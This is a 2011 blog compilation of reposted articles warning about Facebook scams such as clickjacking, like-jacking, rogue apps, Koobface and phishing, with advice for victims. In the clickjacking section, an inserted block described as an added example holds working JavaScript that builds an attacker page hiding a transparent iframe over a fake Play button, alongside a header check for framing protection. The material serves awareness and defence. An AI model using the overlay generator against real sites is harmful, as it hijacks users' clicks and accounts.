
Saturday, May 28, 2011

'Clickjacking' scams on Facebook: The Real Deal

East Syracuse (WSYR-TV) - It's called "clickjacking" and it appears thousands of people are falling victim to it on Facebook. If you haven't been a victim yet, chances are that at least a few of your friends have.


In one version of the scam, crooks are claiming they've got the picture of Osama bin Laden's body after he was killed in a raid by Navy SEALs. They may also say they can tell you who looks at your Facebook page the most or what your kids will look like before they're even born.

Whatever the promise, they're just hoping to fool a few people because from there the clickjacking scam can spread like wildfire.

One recent example targeted a NewsChannel 9 employee's Facebook account. He logged in and received a message saying, "You currently have 4 people stalking your profile... Click here to see who it is."

If you click on the button, you'll be sent to a new screen that asks you to complete a three-step registration process. What they don't tell you is that one of those steps is granting the scammer access to your entire list of friends, so they can blast them with the same message that lured you in.

Another example is the version that promises to show Facebook users how cute their future baby will be. They're bogus, of course, and are really designed to trick the user into downloading spyware to their computer.

If you fall victim to clickjacking, remove the scam posts from your wall and news feed right away, and revoke the permissions of any application you granted access to during the "registration" steps (deleting the posts alone does not take back the access you gave the app). You will also want to be sure the anti-virus protection on your computer is up to date. Lastly, consider sending a message to your friends about the mistake, so others don't follow your lead.

source: 9wsyr.com/content/news/real_deal/story/Clickjacking-scams-on-Facebook-The-Real-Deal/AOYGzWvVGEKbYiaBaqmEzA.cspx

Don't fall for 'First Exposure: iPhone 5' Facebook scam

Recently a new scam appeared on Facebook that dupes users of the social network into spreading spam. Its creators trade on the interest in the new iPhone 5. The scam starts when someone from your group of friends comments on a link in a post that leads to a supposed news article about the iPhone 5 at a website, "greatlakesnews.info". If you click on this link you are redirected to a different website, which shows a captcha window. When you click "verify", a message on your Facebook wall notifies all your friends that you have commented on this and gives them the same misleading iPhone 5 link. After your friends click on this link they are taken to a survey, which is basically marketing, and the creators of the scam make money off it. This type of attack is known as "clickjacking": the "verify" button you think you are pressing is standing in for a Facebook comment control that actually receives the click.

Don't click on this post.

Stick to popular, well-established news sources. Facebook's advice is not to click on strange links even when they come from friends, though following that strictly would cut out many of the legitimate links people share on Facebook; at a minimum, be suspicious of any link that demands a captcha, a survey or a "verify" step before it will show you the story.



source:macrisk.net/mac-security-news/17-first-exposure-iphone-5-facebook-scam

Italian model exposed in Facebook clickjacking attack

The mere mention of anything with a sex connotation on Facebook almost always begets some major activity, with people wanting to know more. As a result, whatever the attack vector or channel might be is propagated, and the attacker is sure to get some response.

In this example a Facebook click-jacking attack jumped on the bandwagon of Italian model Marika Fruscio's unfortunate incident with a wardrobe malfunction on live TV. The title of the scam on Facebook was "The beautiful Marika Fruscio shows her breasts on Italian TV!", which almost sounds like it was staged as opposed to an accident. Whatever the theory, the interesting part of this attack is what happens when someone clicks on the provided link to watch the embedded video.

The example seems harmless as upon clicking the link, the user is directed to another page where they can view the video. While this is happening, the user's account is being exploited to post the video on their homepage to distribute. The user is also added to the list of those who like the video, consequently encouraging others to view this. The series of steps involved is shown below.

An infected account shows the advert as being liked either by a friend or contact within your Facebook account:

The user is then directed to the page below to view the video. Unknown to the user, there are hidden elements and iframes within the HTML code, positioned over the Play button, which load the user's 'Like' control from Facebook. These hidden elements are where the magic of click-jacking, or shall we say like-jacking, happens.

Innocent-looking page as seen by the user:

Riddled page with hidden elements and iframe superimposed on the Play button and various parts of the page:

On clicking the Play button, two events take place. The first is that the user's Facebook account accepts 'liking' the video, with the video being posted on their wall as a result. The second is that the video plays Marika Fruscio's wardrobe malfunction on live TV.

Below is the screen the user is presented with if they are not already logged in to Facebook:

The compromised account then displays a video link on the user's wall encouraging others to view this.

There are several motives for this type of attack. In this instance nothing overtly malicious happens, but it brings to mind the elaborate ploy where an attacker uses this means to earn money. Pay-per-click springs to mind: attackers running these scams usually get the user to click hidden links in order to rack up hits, which in turn reward the attacker with money.

Further analysis using our in-house tools on spontour.net shows the various links and how they are interconnected.



source:community.websense.com/blogs/securitylabs/archive/2011/03/28/Italian-Model-Wardrobe-Malfunction-on-Live-TV.aspx

Rogue Apps

Facebook applications are nothing new; there are oodles of them. Did you know that Facebook apps can obtain personal information from your Facebook profile? Rogue applications may post bogus links to your wall or repost something personal about you.

If the user clicks the ‘Allow’ button when the app first requests permission to access information about them, the app starts its work and the user’s personal information can be accessed easily.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

The Koobface Worm

Koobface is a computer worm that targets users of Facebook and other social networking websites. Koobface spreads across Facebook via posts that include a link claiming to be an Adobe Flash Player update. When the link is clicked, it downloads malware that infects your computer, hijacks your Facebook profile and spams your friends with the same malicious download link. Mainly Windows users are affected by the Koobface worm.

Throughout the day while surfing the net we come across innumerable articles, but once in a while you hit one that actually makes you feel good about having spent time reading it. Frankly, I was also not much aware of such scams, but now that I know of such bad stuff happening, I will be really cautious. Surely you all will be too!

My suggestion would be to share the information about the most common Facebook attacks, spams and hacks with all your friends; you never know, it might save them from becoming the victim of a Facebook scam, hack or attack.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Fake Page Spam

Don’t be tempted to check out every profile page on Facebook, as you never know which ones are genuine. There are a great many fake pages set up on Facebook. Pages headlined with some feature that Facebook does not offer, such as a ‘Dislike button’, are fake. These fake pages are created by hackers who can easily harvest personal information from users once they ‘Like’ the page or, in some cases, choose to attend an event created on the fake page.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Fake Friend Request

Facebook undeniably helps you meet a lot of new people, but that can lead you into trouble. Sad but true, some people are so addicted to Facebook that they don’t seem to see the world outside their laptop/PC screens. Such people are easy targets for hackers and spammers.

If you are someone who accepts friend requests from unknown users, you need to be really cautious, as accepting such requests gives strangers (and scammers) access to the profile data you share with friends. Accept friend requests only from people you actually know, not from strangers.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Money Transfer Scam

This is the easiest way of targeting users. Anybody who gets a message from a friend asking for money because he or she is in dire need would at once want to help. Be cautious and make sure you don’t respond to such messages by transferring money: they typically come from a friend’s compromised account, and this money transfer scam gets you to wire funds to scammers via Western Union or another transfer service.

source:http://webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Phony Email/Message

Spammers/scammers sometimes send phony emails that appear genuine but are not. No matter how convincing these notifications are don’t click until you are sure if it’s true. If an email looks strange, don’t click on any of the links in it, and delete it from your inbox immediately. Be especially wary of emails that ask you to update your account, tell you to open an attachment or something similar.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about

Phishing Schemes

Phishing schemes let hackers learn your credentials: username, password and other information. This can give them access to your profile, and there is a good chance they will then try to get into your other online accounts, especially if you reuse the password. Phishing schemes can be difficult to spot because scammers can easily fool you by setting up a page that resembles the Facebook login portal; check the address bar before typing your password.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Fake Polls/Questionnaires

Polls and questionnaires are a very common thing we all come across while surfing the internet, and Facebook is no exception. Facebook recently implemented a polling system that allows users to post a poll of questions they choose and then share it with their friends. If you are not aware, there are a great many fake polls and questionnaires circulating on Facebook.

These fake polls can redirect users to pages outside Facebook that act as phishing sites, intentionally designed to steal personal information. Fake polls can also lead to malware-laden sites offering quizzes and online games that can directly harm your system.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Clickjacking

Clickjacking, as it plays out on Facebook, starts with an enticing, eye-catching, too-good-to-be-true link posted on someone’s profile, asking you to click it or to copy and paste it into your web browser. Once the user does so, their Facebook wall is populated with the same link, which spreads it to all of their friends and lures them to click in turn, giving the hackers an easy way into a user’s Facebook account.

Remember the video links that after bin Laden’s death spread like wildfire by purporting to offer users a glimpse at video or photos of bin Laden’s death? Well, that was clickjacking.

source:webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

Top Facebook Hacks, Scams And Attacks You Need to Know About

Founded in February 2004, Facebook is a social utility that helps people communicate efficiently with their friends, family and other people in their network. Facebook aims to give you a safe experience on the Internet to stay connected with family and friends. By giving people control over what they share and making the world more open and connected, Facebook is a blessing for people of all generations.

Millions of people today use Facebook to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meet. Needless to say, every good thing comes with its share of cons. You will undeniably agree with me that each one of us fears the hacks and spams. Correct me if I am wrong!

Social media is one of the main avenues that hackers target today. No other means of communication is used as widely as the social media platforms, and this paves the way for hackers to use different methods to entice potential victims. I will not talk at length about the reasons why hackers target the social media platforms. This article is dedicated to the various Facebook hacks and spams that I think we all should be aware of so that we are not the next targets.

We all heaved a sigh of relief when Facebook launched a new security wall to block scammers, but spammers are confident they will find new ways of targeting Facebook users. Listed below are the most common Facebook scams, which I would suggest you all take a look at.

From a simple link to a rogue Facebook application that can steal users’ personal data, there are some spams and attacks that each one of us should know about. The most common Facebook attacks, spams and hacks are:

Clickjacking

Fake Polls/Questionnaires

Phishing Scheme

Phony Email/Message

Money Transfer Scam

Fake Page Spam

The Koobface Worm

Rogue Apps

source:http://webtablab.com/web/top-facebook-hacks-scams-and-attacks-you-need-to-know-about/

What is Clickjacking

Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.


Clickjacking involves placing a fake graphical overlay on top of an existing web page in order to visually change the page while preserving its functionality (buttons, forms, etc.). This is done with the intention of misleading users into interacting with the hidden web page while they believe they are interacting with a completely different website.

Using only CSS z-index and an HTML iframe, an attacker can load the victim web page, with its privileged buttons, in a fully transparent frame. Underneath this transparent iframe, the attacker puts content, like a game, that entices the user to click; the clicks pass through to the invisible frame. You may think you're playing a game when you're actually starting a webcam recording.

For example, in the scam called "OMG teacher nearly kills boy", once you click on the link it tells you that in order to see the video you must complete a survey; if you do that, you have just given a hacker/thief your credit card details and other private info.
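The hidden-frame trick described in the Websense write-up above (a transparent iframe laid over the Play button) and in the z-index/iframe paragraph here, as an added example that is not part of the original page or of any of its sources. It is written for Node.js: the first function generates the attacker's overlay page, the second is the check a site owner runs against its own response headers to confirm that a page refuses to render inside a third-party frame. The target URL is an assumed placeholder, and the header logic is a simplified reading of the X-Frame-Options and CSP frame-ancestors rules, not a full CSP parser.

```javascript
"use strict";

// Assumed placeholder for the page being framed (a "Like" endpoint in the
// scam above). Not a real URL.
const TARGET_URL = "https://like-endpoint.example/plugins/like?href=https://video.example/clip";

// Attacker side. Returns the HTML of a page with a visible Play button and,
// stacked above it, a transparent iframe that holds the target page. The
// frame is invisible (opacity:0) but still receives pointer events, and its
// higher z-index puts it in front of the button, so the click the user thinks
// is "Play" lands on whatever control the target renders at that spot.
function buildLikejackPage(targetUrl, { top = 240, left = 180 } = {}) {
  return [
    "<!doctype html>",
    "<html><body>",
    `<button style="position:absolute; top:${top}px; left:${left}px;">&#9654; Play</button>`,
    `<iframe src="${targetUrl}" scrolling="no"`,
    `        style="position:absolute; top:${top - 8}px; left:${left - 8}px; width:140px; height:48px;`,
    `               opacity:0; z-index:10; border:0;"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// The period's usual client-side defence. It is bypassable (a framing page can
// sandbox the iframe so this script never runs), so it is defence in depth only.
const FRAME_BUSTER = "if (top !== self) { top.location = self.location; }";

// Defender side. Takes a headers object in the shape Node's http module
// returns (names lower-cased, values strings or arrays) and reports whether
// the response forbids framing by other origins. Assumption: a single
// Content-Security-Policy header; merged header lists are not handled.
function framingProtection(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers || {})) {
    h[name.toLowerCase()] = Array.isArray(value) ? value.join(",") : String(value);
  }

  // frame-ancestors, where present, takes precedence over X-Frame-Options.
  const csp = h["content-security-policy"] || "";
  const directive = csp
    .split(";")
    .map((d) => d.trim())
    .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1).map((s) => s.toLowerCase());
    // "*" or a bare scheme such as "https:" admits any origin; anything else
    // ('none', 'self', or listed hosts) restricts who may frame the page.
    const open = sources.some((s) => s === "*" || /^[a-z][a-z0-9+.-]*:$/.test(s));
    return open
      ? { protected: false, reason: `CSP admits any origin: ${directive}` }
      : { protected: true, reason: `CSP ${directive}` };
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY" || xfo === "SAMEORIGIN") {
    return { protected: true, reason: `X-Frame-Options: ${xfo}` };
  }
  if (xfo.startsWith("ALLOW-FROM")) {
    return { protected: false, reason: "ALLOW-FROM is ignored by most browsers; use frame-ancestors" };
  }
  return { protected: false, reason: "no X-Frame-Options or frame-ancestors: page can be framed" };
}

// Demo when run directly with `node likejack.js`.
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log(buildLikejackPage(TARGET_URL));
  console.log(`<script>${FRAME_BUSTER}</script>`);
  console.log(framingProtection({ "x-frame-options": "DENY" }));
  console.log(framingProtection({ "content-security-policy": "frame-ancestors *" }));
  console.log(framingProtection({}));
}
```

Two practical notes. The JavaScript frame-buster was routinely defeated even in 2011, which is why the header-based controls (X-Frame-Options then, CSP frame-ancestors later) are the ones to rely on. And the Like widget is designed to be embedded on third-party sites, which is exactly why a framing header cannot protect it and why like-jacking has to be countered by the platform rather than by the framed page.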

source:http://www.mywot.com/en/forum/12372-clickjacking-attacks-spotted-on-facebook

Thursday, May 26, 2011

Dear parents of the Facebook Generation, it's time to step it up.

When a 13-year old Tacoma, Washington boy named Vito LaPinta, Jr. learned about the death of Osama Bin Laden he decided to help warn the president on Facebook about what might happen next regarding suicide bombers. A week later, Vito was called into the principal’s office of his middle school and greeted by a suited up Secret Service agent wearing dark glasses.

Vito, admittedly terrified by the agent, was then told by the agent that his post was considered a ‘threat towards the President.’ When asked how she felt about what had gone down, Vito’s mother Timi Robertson stated “My 13-year-old son is supposed to be safe and secure in his classroom and he’s being interrogated without my knowledge or consent privately.” As a parent I too would’ve been livid. I agree with Timi’s reaction but I also wonder if she’s doing everything she can to monitor what her son is doing and saying online.

The challenges for us parents

Being a parent in this day and age can be really tough. Back in the day, it was harder to keep track of our tweens and teens because we couldn’t get ahold of them as easily. Now, while it’s much easier to stay in touch via mobile phone, SMS, Facebook etc., there’s a whole new set of challenges that really put our parenting skills to the test.

Nowadays, parents have a new job, and it’s in the field of online PR training. Tweens and teens are biologically not yet good at self-perception, at being in tune with how the world sees them as individuals. They don’t fully realize (and can’t, because of their age) that if they joke about murder, suicide, sex, drugs, alcohol, race, religion, etc. on a site like Facebook, where they might be connected to parents, grandparents, parents of their friends, etc., it will result in an inadvertent rippling storm of offensiveness to many people they care a lot about. Something small and meant to be harmless could get them, and their parents, into big trouble, not just legally but in family and academic social circles.

An aversion to technology, the web, or Facebook is no excuse

With so much information, content and opinions being so easily shareable, therein lies the importance of your child’s understanding of their potential audience AND their understanding of how what they say and do online is easily seen by so many. If you have a teenager online, watch how they interact with their friends, family members etc. You’ll be able to see quickly how great of a job you are doing (or not) monitoring and preparing them for such a transparent and communicative world.

Believe or not, I still know quite a few people that don’t even have an email address let alone a Facebook account. Many of them, out of fear of the unknown and stubbornness mostly, refuse to get on board. I’m fine with that if you don’t have kids that are online. If you do have children that are on social networks like Facebook, YouTube and Twitter, if you don’t at least have an account on any of the sites that your child is on for monitoring purposes and also know what their personal login is, you are another failing parent in the digital age.

Another scary thing is that 7.5 million of the 20 million minors on Facebook are below the minimum age.

Yikes.

While I know that kids will always lie and experiment and push the envelope with us parents, it’s important that we minimize the risk by communicating with them often and making sure to keep a close eye on those under 13 years old. It’s our duty to monitor the appropriation of sites visited, content downloaded, and activity shared online.

Many teens also have an iPod Touch and a Foursquare or GoWalla account (I’ve deemed geo-location apps off limits to my teenagers). This also means they are able to plot their locations when Wi-Fi is available, sharing it with the world, not fully understanding what it really means to create database records of their movement, their most frequented hang out spots, and how it could be used against them.

As parents of children in one of the most fast-paced eras of information where API’s make it possible for anyone to track our children’s activities unless they’re off the grid completely or have had help from their parents to lock down their privacy settings, our presence and involvement in their day-to-day is more important than ever. Even when you think you’ve done a great job with this, it never hurts to have regular discussions with them and remind them about the impact of their content and activity online. It’s important for both their safety, and more importantly, their offline reputation.

source: http://www.zdnet.com/blog/feeds/dear-parents-of-the-facebook-generation-its-time-to-step-it-up/3904

[ALERT] Have you heard of HCG diet? AMAZING AND IT WORKS, I lost 2lbs in the last 3 days

Scam Signature Message: Have you heard of HCG diet? AMAZING AND IT WORKS, I lost 2lbs in the last 3 days

If you see this on a friend's News Feed, or if it is posted directly to your wall, then there is a good possibility that your friend has been hacked or has a rogue Facebook application installed. We have seen this posting several times. There is almost always a disclaimer from the Facebook account doing the posting, claiming that they didn't post it and don't know how it happened.

Trending: May 2011

Why it's a Scam:

Once you click on the Wall link, you are taken to www.hcg-ultrass.info/:

This page is engineered to look like a news site, and serves as an infomercial for HCG Ultra drops. It appears the scammers are taking control of user accounts, and then spamming this message to their friends. The goal here is to use the trust you have in your friend's endorsement and purchase the diet drops. We can't speak to the legitimacy of the product, but considering the marketing methods employed we recommend you steer clear of this product. You could likely find similar products far cheaper at a grocery or health food store.

How to Deal with the Scam:

If you see this posted on your friend's Wall, then try to contact them immediately and let them know that their Facebook account could be compromised. You can refer them to the following posts on what they should do next:

Four things you need to do if your Facebook account gets hacked

How to protect your Facebook account from Rogue Applications

If you or your Facebook friends are falling for tricks like this, it's time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to stay informed of the latest security issues.

source:http://facecrooks.com/safety-center/scam-watch/item/1311-alert-have-you-heard-of-hcg-diet?-amazing-and-it-works-i-lost-2lbs-in-the-last-3-days

[SCAM ALERT] Get Your 2 Free Southwest Tickets Now - Ends Sunday

Scam Signature Message: Get Your 2 Free Southwest Tickets Now! Ends Sunday


Scam Type: Comment Exploit, Bogus Offer

Trending: May 2011

Why it's a Scam:

Clicking the wall post link takes you to the scam's landing page. Clicking its "Comment" button posts the very same status update to your Wall and loads a bogus offer page.

If you read the fine print, you must complete several "reward offers." Not only is this a ridiculous hoop to jump through that will cost you a lot of money in the end, but the scammers are also acquiring a treasure trove of your personal data. You will be required to provide your name, address, phone numbers and date of birth. This enables the shady marketers not only to spam your Facebook account but also to harass you via snail mail, phone calls and text messages.

How to Deal with the Scam:

If you did make the mistake of commenting on the main page, you are now spamming your friends with the scammer's message. You should clean-up your newsfeed and profile to remove references to the scam. (click the "x" in the top right hand corner of the post).

The level of damage control required will largely depend on how many "special offers" you participated in. If you submitted your name, address, email, etc., then be on the lookout for more bogus offers arriving in your email and regular mail. Also be on alert for identity theft attempts.

If you or your Facebook friends are falling for tricks like this, it's time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues.

source:http://facecrooks.com/safety-center/scam-watch/item/1314-scam-alert-get-your-2-free-southwest-tickets-now-ends-sunday

[Like-Jacking Alert] Amazing effect - WebCamera

Scam Signature Message: Amazing effect - WebCamera Big Baby Born !

This wall posting has been blurred because it contains a picture of a woman's vagina. The actual video shows a full grown man's head popping out like a baby.

Scam Type: Like-Jacking

Trending: May 2011

Why it's a Scam:

Clicking the wall post link takes you to amazing-baby-born.blogspot[dot]com. A lot of scams are hosted on blogspot, so always be wary of any links to this domain.

Clicking the play button "like-jacks" your Facebook account and posts the spammer's message to your Facebook Wall. At this time, it appears the sole purpose of the page is to generate advertising revenue from the display ads shown. We didn't encounter any malware or survey scams, but that could change in the future.

How to Deal with the Scam:

If you did make the mistake of clicking the play button for the video, your NewsFeed now has a posting stating that you "like" the video shown above. Clean this up by clicking the "x" in the top right hand corner of the post.

If you or your Facebook friends are falling for tricks like this, it's time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues.

source: http://facecrooks.com/safety-center/scam-watch/item/1315-like-jacking-alert-amazing-effect-webcamera